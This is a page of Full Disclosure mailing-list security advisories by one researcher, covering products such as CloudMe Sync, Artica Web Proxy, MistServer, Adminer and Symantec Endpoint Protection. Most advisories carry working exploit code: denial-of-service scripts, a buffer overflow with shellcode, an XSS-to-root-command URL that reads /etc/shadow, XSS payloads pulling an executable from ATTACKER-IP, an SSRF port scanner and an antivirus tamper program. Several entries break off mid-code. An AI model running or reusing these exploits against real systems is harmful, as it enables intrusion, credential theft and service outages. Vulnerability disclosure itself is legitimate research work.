exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] CVE-2018-7449 SEGGER embOS/IP FTP Server v3.22 / FTP CMDs Denial Of Service
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/SEGGER-embOS-FTP-SERVER-v3.22-FTP-COMMANDS-DENIAL-OF-SERVICE.txt [+] ISR: Apparition Security Vendor: = www.segger.com Product: === embOS/IP FTP Server v3.22 Vulnerability Type: === FTP Commands Denial Of Service CVE Reference: == CVE-2018-7449 Security Issue: SEGGER embOS/IP FTP Server 3.22 allows remote attackers to cause a denial of service (daemon crash) via an invalid LIST, STOR, or RETR command. STOR 666\r\n LIST\r\n RETR '+'..\\'*8+'Windows\system.ini\r\n TELNET x.x.x.x 21 220 Welcome to embOS/IP FTP server USER anonymous 331 Password required. PASS anonymous 230 User logged in, proceed. STOR Bye! CRASH!!! Exploit/POC: = import socket,time VICTIM=raw_input('[+]Segger v3.22 FTP Server IP > ') USR='anonymous' PWD='anonymous' CMD="STOR Bye!\r\n" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((VICTIM, 21)) print s.recv(1024) # Recieve FTP Banner time.sleep(1) s.send("USER " + USR+ "\r\n") print s.recv(1024) time.sleep(1) s.send("PASS "+ PWD+"\r\n") # print s.recv(1024) time.sleep(1) s.send(CMD) print 'Sent %s' % CMD s.close() Network Access: === Remote Severity: = Medium Disclosure Timeline: = Vendor Notification: February 17, 2018 Vendor acknowledgement: February 19, 2018 Vendor released fixed version v3.22a : February 23, 2018 March 1, 2018 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] DualDesk v20 "Proxy.exe" Server / Denial Of Service - CVE-2018-7583
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/DUALDESK-v20-DENIAL-OF-SERVICE.txt [+] ISR: Apparition Security Vendor: === www.dualdesk.com Product: === DualDesk v20 DualDesk is powerful, easy to use remote support software that is a one-time purchase and lets your technical support staff remote assist a PC anywhere on the internet through firewalls in seconds with no configuration. Vulnerability Type: === Denial Of Service CVE Reference: == CVE-2018-7583 Security Issue: Remote unauthenticated attackers can crash the "Proxy.exe" Server component of Dualdesk application which listens on TCP Port 5500 by sending a long string of junk chars. (d24.d60): Security check failure or stack buffer overrun - code c409 (first/second chance not available) eax= ebx=0257f1c0 ecx= edx= esi=0002 edi= eip=77c6016d esp=0257f170 ebp=0257f20c iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=0246 ntdll!NtWaitForMultipleObjects+0x15: 77c6016d 83c404 add esp,4 Exploit/POC: = Start the Dualdesk Run Proxy as Application. C:\>python -c "print 'a'*8000" > crash.txt C:\>type crash.txt | nc.exe localhost 5500 Crash!!! Network Access: === Remote Severity: = Medium Disclosure Timeline: = Vendor Notification: February 4, 2018 Second attempt : February 17, 2018 Request CVE, assigned by Mitre : March 1, 2018 March 1, 2018 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] CVE-2018-6892 CloudMe Sync <= v1.10.9 Unauthenticated Remote Buffer Overflow
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/CLOUDME-SYNC-UNAUTHENTICATED-REMOTE-BUFFER-OVERFLOW.txt [+] ISR: Apparition Security [+] SSD Beyond Security Submission: https://blogs.securiteam.com/index.php/archives/3669 Vendor: =www.cloudme.com Product: === CloudMe Sync <= v1.10.9 (CloudMe_1109.exe) hash: 0e83351dbf86562a70d1999df7674aa0 CloudMe is a file storage service operated by CloudMe AB that offers cloud storage, file synchronization and client software. It features a blue folder that appears on all devices with the same content, all files are synchronized between devices. Vulnerability Type: === Buffer Overflow CVE Reference: == CVE-2018-6892 Security Issue: Unauthenticated remote attackers that can connect to the "CloudMe Sync" client application listening on port , can send a malicious payload causing a Buffer Overflow condition. This will result in an attacker controlling the programs execution flow and allowing arbitrary code execution on the victims PC. CloudMe Sync client creates a socket listening on TCP Port (0x22B8) In Qt5Core: 00564DF1 . C74424 04 B822>MOV DWORD PTR SS:[ESP+4],22B8 00564DF9 . 890424 MOV DWORD PTR SS:[ESP],EAX 00564DFC . FF15 B8738100 CALL DWORD PTR DS:[<&Qt5Network._ZN10QTc>; Qt5Netwo._ZN10QTcpServer6listenERK12QHostAddresst C:\>netstat -ano | findstr TCP0.0.0.0: 0.0.0.0:0 LISTENING 15504 TCP[::]: [::]:0 LISTENING 15504 Buffer Overflow: EIP register will be overwritten at about 1075 bytes. EAX 0001 ECX 76F698DA msvcrt.76F698DA EDX 0035 EBX 41414141 ESP 0028D470 EBP 41414141 ESI 41414141 EDI 41414141 EIP 41414141 Stack Dump: == (508.524): Access violation - code c005 (first/second chance not available) *** ERROR: Symbol file could not be found. Defaulted to export symbols for ntdll.dll - eax= ebx= ecx=41414141 edx=778f353d esi= edi= eip=41414141 esp=00091474 ebp=00091494 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 41414141 ?? ??? Exploitation is very easy as ASLR SafeSEH are all set to false making the exploit portable and able to work across different operating systems. We will therefore use Structured Exceptional Handler overwrite for our exploit. e.g. 6FE6909D 0x6fe6909d : pop ebx # pop esi # ret 0x20 | {PAGE_EXECUTE_READ} [libstdc++-6.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\victimo\AppData\Local\Programs\CloudMe\CloudMe\libstdc++-6.dll) 00476795 0x00476795 : pop ebx # pop esi # ret 0x20 | startnull {PAGE_EXECUTE_READ} [CloudMe.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\victimo\AppData\Local\Programs\CloudMe\CloudMe\CloudMe.exe) 61E7B7F6 0x61e7b7f6 : pop ebx # pop esi # ret 0x20 | {PAGE_EXECUTE_READ} [Qt5Gui.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.9.0.0 (C:\Users\victimo\AppData\Local\Programs\CloudMe\CloudMe\Qt5Gui.dll) 0day Exploit POC: == import socket,struct print 'CloudMe Sync v1.10.9' print 'Unauthenticated Remote Buffer Overflow 0day' print 'Discovery/credits: hyp3rlinx' print 'apparition security\n' #shellcode to pop calc.exe Windows 7 SP1 sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B" "\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B" "\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31" "\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA" "\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14" "\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65" "\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC") ip=raw_input('[+] CloudMe Target IP> ') nseh="\xEB\x06"+"\x90"*2#JMP seh=struct.pack('https://www.cloudme.com/en/sync#https://blogs.securiteam.com/index.php/archives/3669 POC Video URL: =https://vimeo.com/255280060 Network Access: === Remote Severity: = High Disclosure Timeline: = SSD Vulnerability submission: January 17, 2018 Would like to acknowledge Beyond Security’s SSD program for the help with co-ordination of this vulnerability. More details can be found on their blog at: https://blogs.securiteam.com/index.php/archives/3669 February 11, 2018 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, prov
[FD] CVS Suite 2009R2 Insecure Library Loading CVE-2018-6461
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/CVS-SUITE-2009R2-INSECURE-LIBRARY-LOADING-CVE-2018-6461.txt [+] ISR: Apparition Security Vendor: =march-hare.com Product: === WINCVS 2009R2 CVS Suite is a modern versioning system that combines the power and stability of CVS with modern easy to use client software and support for Configuration Management best practice. As the newest major release of the world’s most popular versioning system, CVS Suite 2009R2 continues CVSNT’s blazing pace of innovation with new features and usability enhacements. Vulnerability Type: === Insecure Library Loading CVE Reference: == CVE-2018-6461 Security Issue: Non privileged user can write files to "C:\ProgramData\March Hare\myrepo\CVSROOT" to gain authenticated access with the same privileges as the current logged on user, in addition they can run arbitrary code with same privileges as that of the victim. e.g. C:\ProgramData\March Hare\myrepo\CVSROOT>cacls * | more C:\ProgramData\March Hare\myrepo\CVSROOT\CVS Everyone:(OI)(CI)F NT AUTHORITY\SYSTEM:(OI)(CI)F WinCVS: Attackers can place a malicious DLLs in CVSROOT and wait for CVS user to run WINCVS, then when browse to a repository in CVSROOT and right click on CVSROOT or a CVSROOT file to 'Open in new instance' or Ctrl+F2 then the attackers DLL will execute. Attacker supplied DLL e.g. 'python31.dll' will execute if placed on victims desktop and user initially opens 'wicvs2.exe'. basically anywhere or repository we can place malicious DLL that they can browse to should work. WinMerge 2009 also vulnerable: If a WinMerge project file is opened from a remote share where specific attacker supplied DLLs have been placed it will load and execute it. vuln DLL(s): tcl87.dll python30.dll python31.dll Basically anywhere or any repository we can place malicious DLL that they can browse to should work. References: http://march-hare.com/cvspro/vulnwincvs.htm Exploit/POC: = Create "python31.dll" #include //gcc -c python31.c //gcc -shared -o python31.dll python31.o BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){ switch (reason) { case DLL_PROCESS_ATTACH: MessageBox(NULL, "Done!", "hyp3rlinx", MB_OK); break; } return 0; } Network Access: === Remote Severity: = High Disclosure Timeline: = Vendor Notification: January 26, 2018 Vendor acknowledgemen: January 27, 2018 Vendor releases fix: February 2, 2018 February 5, 2018 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Adminer <= v4.3.1 Server Side Request Forgery
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/ADMINER-UNAUTHENTICATED-SERVER-SIDE-REQUEST-FORGERY.txt [+] ISR: apparition security Vendor: ==www.adminer.org Product: Adminer <= v4.3.1 Adminer (formerly phpMinAdmin) is a full-featured database management tool written in PHP. Conversely to phpMyAdmin, it consist of a single file ready to deploy to the target server. Adminer is available for MySQL, PostgreSQL, SQLite, MS SQL, Oracle, Firebird, SimpleDB, Elasticsearch and MongoDB. https://github.com/vrana/adminer/releases/ Vulnerability Type: === Server Side Request Forgery CVE Reference: == N/A Security Issue: Adminer allows unauthenticated connections to be initiated to arbitrary systems/ports. This vulnerability can be used to potentially bypass firewalls to identify internal hosts and perform port scanning of other servers for reconnaissance purposes. Funny thing is Adminer throttles invalid login attempts but allows endless unauthorized HTTP connections to other systems as long as your not trying to authenticate to Adminer itself. Situations where Adminer can talk to a server that we are not allowed to (ACL) and where we can talk to the server hosting Adminer, it can do recon for us. Recently in LAN I was firewalled off from a server, however another server running Adminer I can talk to. Also, that Adminer server can talk to the target. Since Adminer suffers from Server-Side Request Forgery, I can scan for open ports and gather information from that firewalled off protected server. This allowed me to not only bypass the ACL but also hide from the threat detection system (IDS) monitoring east west connections. However, sysadmins who check the logs on the server hosting Adminer application will see our port scans. root@lamp log/apache2# cat other_vhosts_access.log localhost:12322 ATTACKER-IP - - [2/Jan/2018:14:25:11 +] "GET ///?server=TARGET-IP:21&username= HTTP/1.1" 403 1429 "-" "-" localhost:12322 ATTACKER-IP - - [2/Jan/2018:14:26:24 +] "GET ///?server=TARGET-IP:22&username= HTTP/1.1" 403 6019 "-" "-" localhost:12322 ATTACKER-IP - - [2/Jan/2018:14:26:56 +] "GET ///?server=TARGET-IP:23&username= HTTP/1.1" 403 6021 "-" "-" Details: == By comparing different failed error responses from Adminer when making SSRF bogus connections, I figured out which ports are open/closed. Port open ==> Lost connection to MySQL server at 'reading initial communication packet Port open ==> MySQL server has gone away Port open ==> Bad file descriptor Port closed ==> Can't connect to MySQL server on ''; Port closed ==> No connection could be made because the target machine actively refused it Port closed ==> A connection attempt failed. This worked so well for me I wrote a quick port scanner 'PortMiner' as a proof of concept that leverages Adminer SSRF vulnerability. PortMiner observations: == No response 'read operation timed out' means the port is possibly open or filtered and should be given a closer look if possible. This seems to occur when scanning Web server ports like 80, 443. However, when we get error responses like the ones above from the server we can be fairly certain a port is either open/closed. Quick POC: echo -e 'HTTP/1.1 200 OK\r\n\r\n' | nc -l -p Use range - Exploit/POC: = import socket,re,ssl,warnings,subprocess,time from platform import system as system_name from os import system as system_call #Adminer Server Side Request Forgery #PortMiner Scanner Tool #by John Page (hyp3rlinx) #ISR: ApparitionSec #hyp3rlinx.altervista.org #= #D1rty0Tis says hi. #timeout MAX_TIME=32 #ports to log port_lst=[] #Web server response often times out but usually means ports open. false_pos_ports=['80','443'] BANNER=''' _ __ __ _ | _ \ | | | \/ (_) | |__) |__ _ __| |_| \ / |_ _ __ ___ _ __ | ___/ _ \| '__| __| |\/| | | '_ \ / _ \ '__| | | | (_) | | | |_| | | | | | | | __/ | |_| \___/|_| \__|_| |_|_|_| |_|\___|_| ''' def info(): print "\nPortMiner depends on Error messages to determine open/closed ports." print "Read operations reported 'timed out' may be open/filtered.\n" def greet(): print 'Adminer Unauthenticated SSRF Port Scanner Tool' print 'Targets Adminer used for MySQL administration\n' print 'by hyp3rlinx - apparition security' print '--
[FD] Abyss Web Server < v2.11.6 Memory Heap Corruption
[+] Credits: John Page (aka HyP3rlinX) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/ABYSS-WEB-SERVER-MEMORY-HEAP-CORRUPTION.txt [+] ISR: ApparitionSec Vendor: ==aprelium.com Product: === Abyss Web Server < v2.11.6 Vulnerability Type: === Memory Heap Corruption CVE Reference: == N/A Security Issue: Possible to corrupt heap memory of the Abyss Web Server by sending specially crafted HTML in repeated HTTP POST requests. Users should upgrade to latest version v2.11.6. GetUrlPageData2 (WinHttp) failed: 12002. FAULTING_IP: msvcrt!memcpy+5a 75e49b60 f3a5rep movs dword ptr es:[edi],dword ptr [esi] EXCEPTION_RECORD: -- (.exr 0x) ExceptionAddress: 75e49b60 (msvcrt!memcpy+0x005a) ExceptionCode: c005 (Access violation) ExceptionFlags: NumberParameters: 2 Parameter[0]: Parameter[1]: 003b9000 Attempt to read from address 003b9000 CONTEXT: -- (.cxr 0x0;r) eax= ebx=075c33f8 ecx=000efd46 edx=0002 esi=075c33b8 edi=0651edb0 eip=77670c52 esp=0651ea70 ebp=0651ea80 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=0246 ntdll!ZwGetContextThread+0x12: 77670c52 83c404 add esp,4 PROCESS_NAME: abyssws.exe ERROR_CODE: (NTSTATUS) 0xc005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s. EXCEPTION_CODE: (NTSTATUS) 0xc005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s. EXCEPTION_PARAMETER1: EXCEPTION_PARAMETER2: 003b9000 READ_ADDRESS: 003b9000 FOLLOWUP_IP: abyssws+413d9 004413d9 59 pop ecx NTGLOBALFLAG: 0 APPLICATION_VERIFIER_FLAGS: 0 APP: abyssws.exe ANALYSIS_VERSION: 6.3.9600.17298 (debuggers(dbg).141024-1500) x86fre LAST_CONTROL_TRANSFER: from 0043f840 to 75e49b60 FAULTING_THREAD: BUGCHECK_STR: APPLICATION_FAULT_ACTIONABLE_HEAP_CORRUPTION_heap_failure_block_not_busy_INVALID_POINTER_READ_PROBABLYEXPLOITABLE PRIMARY_PROBLEM_CLASS: ACTIONABLE_HEAP_CORRUPTION_heap_failure_block_not_busy_PROBABLYEXPLOITABLE DEFAULT_BUCKET_ID: ACTIONABLE_HEAP_CORRUPTION_heap_failure_block_not_busy_PROBABLYEXPLOITABLE STACK_TEXT: 777542a8 776cd9bc ntdll!RtlFreeHeap+0x64 777542ac 75e498cd msvcrt!free+0xcd 777542b0 004413d9 abyssws+0x413d9 777542b4 004089d0 abyssws+0x89d0 777542b8 0040a607 abyssws+0xa607 777542bc 0040bd58 abyssws+0xbd58 777542c0 0040cb5b abyssws+0xcb5b SYMBOL_STACK_INDEX: 2 SYMBOL_NAME: abyssws+413d9 FOLLOWUP_NAME: MachineOwner MODULE_NAME: abyssws IMAGE_NAME: abyssws.exe DEBUG_FLR_IMAGE_TIMESTAMP: 5807a3cb STACK_COMMAND: dps 777542a8 ; kb FAILURE_BUCKET_ID: ACTIONABLE_HEAP_CORRUPTION_heap_failure_block_not_busy_PROBABLYEXPLOITABLE_c005_abyssws.exe!Unknown BUCKET_ID: APPLICATION_FAULT_ACTIONABLE_HEAP_CORRUPTION_heap_failure_block_not_busy_INVALID_POINTER_READ_PROBABLYEXPLOITABLE_abyssws+413d9 ANALYSIS_SOURCE: UM FAILURE_ID_HASH_STRING: um:actionable_heap_corruption_heap_failure_block_not_busy_probablyexploitable_c005_abyssws.exe!unknown FAILURE_ID_HASH: {0ba3122b-4351-5a85-a0ea-294a6ce77042} Followup: MachineOwner - /// The stored exception information can be accessed via .ecxr. (2740.30b8): Access violation - code c005 (first/second chance not available) eax= ebx=075c33f8 ecx=000efd46 edx=0002 esi=075c33b8 edi=0651edb0 eip=77670c52 esp=0651ea70 ebp=0651ea80 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=0246 ntdll!ZwGetContextThread+0x12: 77670c52 83c404 add esp,4 0:011> !load winext/msec 0:011> !exploitable !exploitable 1.6.0.0 Exploitability Classification: PROBABLY_EXPLOITABLE Recommended Bug Title: Probably Exploitable - Read Access Violation on Block Data Move starting at msvcrt!memcpy+0x0250 (Hash=0xb1db8cd3.0x508907b2) This is a read access violation in a block data move, and is therefore classified as probably exploitable. ? References: https://aprelium.com/news/abws2-11-6.html Exploit/POC: = Cause Heap Corruption in Abyss Server. //Abyss Web Server Memory (heap) Corruption POC //Discover by hyp3rlinx //Error code: 0xc374 is STATUS_HEAP_CORRUPTION //0xc374 - heap has been corrupted. //=== window.onerror=function(){ return true } var target='<a rel="nofollow" href="http://VICTIM-IP:/hosts/host@0/edit/ipcontrol">http://VICTIM-IP:/hosts/host@0/edit/ipcontrol</a>'; function mk_iframe_targets(f){ var tmp = document.createElement('IFRAME') tmp.style='display:none'tmp.name='hidden-frame'+f return tmp } function mk_inputs(id
[FD] Artica Web Proxy v3.06 Remote Code Execution / CVE-2017-17055
[+] Credits: John Page (aka Hyp3rlinX) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/ARTICA-WEB-PROXY-v3.06-REMOTE-CODE-EXECUTION-CVE-2017-17055.txt [+] ISR: ApparitionSec Vendor: ===www.articatech.com Product: = Artica Web Proxy v.3.06.112216 Artica Tech offers a powerful but easy-to-use Enterprise-Class Web Security and Control solution, usually the preserve of large companies. ARTICA PROXY Solutions have been developed over the past 10 years as an Open Source Project to help SMEs and public bodies protect both their organizations and employees from risks posed by the Internet. Vulnerability Type: === Remote Code Execution CVE Reference: == CVE-2017-17055 Security Issue: Artica offers a web based command line emulator 'system.terminal.php' (shell), allowing authenticated users to execute OS commands as root. However, artica fails to sanitize the following HTTP request parameter $_GET["username-form-id"] used in 'freeradius.users.php'. Therefore, authenticated users who click an attacker supplied link or visit a malicious webpage, can result in execution of attacker supplied Javascript code. Which is then used to execute unauthorized Operating System Commands (RCE) on the affected Artica Web Proxy Server abusing the system.terminal.php functionality. Result is attacker takeover of the artica server. Exploit/POC: = 1) Steal artica Server "/etc/shadow" password file. https://VICTIM-IP:9000/freeradius.users.php?username-form-id=%3C%2Fscript%3E%3Cscript%3Evar%20xhr=new%20XMLHttpRequest();xhr.onreadystatechange=function(){if(xhr.status==200){alert(xhr.responseText);}};xhr.open(%27POST%27,%27https://VICTIM-IP:9000/system.terminal.php%27,true);xhr.setRequestHeader(%27Content-type%27,%27application/x-www-form-urlencoded%27);xhr.send(%27cmdline=cat%20/etc/shadow%27);%3C%2Fscript%3E%3Cscript%3E 2) Write file 'PWN' to /tmp dir. https://VICTIM-IP:9000/freeradius.users.php?username-form-id=%3C%2Fscript%3E%3Cscript%3Evar%20xhr=new%20XMLHttpRequest();xhr.onreadystatechange=function(){if(xhr.status==200){alert(xhr.responseText);}};xhr.open(%27POST%27,%27https://VICTIM-IP:9000/system.terminal.php%27,true);xhr.setRequestHeader(%27Content-type%27,%27application/x-www-form-urlencoded%27);xhr.send(%27cmdline=touch%20/tmp/PWN%27);%3C%2Fscript%3E%3Cscript%3E Network Access: === Remote Severity: = High Disclosure Timeline: = Vendor Notification: November 28, 2017 Vendor Confirms Vulnerability : November 28, 2017 Vendor Reply "Fixed in 3.06.112911 / ISO released" : November 29, 2017 December 1, 2017 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Mist Server v2.12 Unauthenticated Persistent XSS CVE-2017-16884
[+] Credits: John Page (aka Hyp3rlinX) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MIST-SERVER-v2.12-UNAUTHENTICATED-PERSISTENT-XSS-CVE-2017-16884.txt [+] ISR: ApparitionSec Vendor: =mistserver.org Product: === MistServer v2.12 MistServer is a full-featured, next-generation streaming media toolkit for OTT (internet streaming). Vulnerability Type: === Unauthenticated Persistent XSS CVE Reference: == CVE-2017-16884 Security Issue: Unauthenticated remote attackers can inject persistent XSS payloads by making failed HTTP authentication requests. Attacker supplied payloads will get stored in the server logs as failed authentication requests alerts. Mistserver echoes back the unsanitized payloads in Mist Servers Web interface automatically due to automatic refresh of the UI every few seconds, thereby, executing arbitrary attacker supplied code. References: https://news.mistserver.org/news/78/Stable+release+2.13+now+available%21 Exploit/POC: = import requests #INJECT IFRAME requests.get('http://VICTIM-IP:4242/admin/api?callback=&command={"authorize":{"password":"666","username":";http://ATTACKER-IP\'>"}}') #PUSH MALWARE requests.get('http://VICTIM-IP:4242/admin/api?callback=&command={"authorize":{"password":"666","username":";http://ATTACKER-IP/bad.exe\'>"}}') #EXFIL LOGS requests.get('http://VICTIM-IP:4242/admin/api?command={"authorize":{"password":"666","username":";alert(document.body.innerHTML)"}}') Network Access: === Remote Severity: = High Disclosure Timeline: = Vendor Notification: October 19, 2017 Vendor Acknowledgement : October 20, 2017 Vendor Released Fix : November 30, 2017 December 1, 2017 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Symantec Endpoint Protection (SEP) v12.1 Tamper-protection Bypass CVE-2017-6331
[+] Credits: John Page a.k.a hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/CVE-2017-6331-SYMANTEC-ENDPOINT-PROTECTION-TAMPER-PROTECTION-BYPASS.txt [+] ISR: ApparitionSec Vendor: ===www.symantec.com Product: === Symantec Endpoint Protection v12.1.6 (12.1 RU6 MP5) Symantec 12.1.7004.6500 Vulnerability Type: === Tamper-Protection Bypass Denial Of Service / Message Spoof CVE Reference: == CVE-2017-6331 SSG16-041 Security Issue: Symantec Endpoint Protection (SEP), does not validate where WinAPI messages comes from (lack of UIPI). Therefore, malware can easily spoof messages to the UI or send WM_SYSCOMMAND to close the SEP UI denying end user ability to scan / run the EP AntiVirus protection. Spoofed messages could also potentially inform a user a scan was clean. Unfortunately Symantecs advisory left out details of the Denial Of Service as well as minimizing the amount of text a malware could inject into the UI which would result in compromising the integrity of the Symantec Endpoint Protection Control Panel user interface. References: ===https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20171106_00 Exploit/POC: = 1) Compile below C program, it targets various components of SEP, comment out what you want to send to the UI. 2) Try to open the Symantec Endpoint UI and you will be denied. 3) Or inject attacker supplied messages intructing the user the file is clean etc. #include #include #define VICTIM "DevViewer.exe" //By HYP3RLINX //ISR: ApparitionSec //Symantec EP Protection - Tamper Protection Bypass Vulnerability //Tested successfully on Symantec 12.1.6 (12.1 RU6 MP5) build 7004 Symantec 12.1.7004.6500 Windows 7 //How: FindWindow / SendMessage Win32 API //Impact: DOS / Integrity Compromised //TO-DO: Get Window text for SavUI.exe and DOS to prevent AV scans. void main(void){ while(1){ HWND hWnd = FindWindow( NULL, TEXT("Status - Symantec Endpoint Protection")); if(hWnd!=NULL){ //This injects arbitrary messages to SEP UI. SetWindowText(hWnd, "*** Important Security Update, Visit: http://PWN3D.com/EVIL.exe download and follow instructions. ***"); //This prevents a user from being able to run AV scans and renders SEP UI useless //SendMessage(hWnd, WM_SYSCOMMAND, SC_CLOSE, 0); } //HWND savUI = FindWindowEx(0, 0, "Symantec Endpoint Protection", 0); HWND x = FindWindow(NULL, TEXT("DevViewer")); if(x!=NULL){ SendMessage(x, WM_SYSCOMMAND, SC_CLOSE, 0); } HWND x2 = FindWindow(NULL, TEXT("DoScan Help")); SendMessage(x2, WM_SYSCOMMAND, SC_CLOSE, 0); HWND x3 = FindWindow(NULL, TEXT("Sylink Drop")); SendMessage(x3, WM_SYSCOMMAND, SC_CLOSE, 0); HWND x4 = FindWindow(NULL, TEXT("Manual Scan started on 7/8/2016")); if(x!=NULL){ SendMessage(x4, WM_SYSCOMMAND, SC_CLOSE, 0); } sleep(1); } } Network Access: === Local Severity: = Medium Disclosure Timeline: = Vendor Notification: July 8, 2016 Vendor acknowledged: 7/14/16 Vendor advisory : November 6, 2017 November 10, 2017 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] CVE-2017-12969 Avaya OfficeScan IPO Remote ActiveX Buffer Overflow
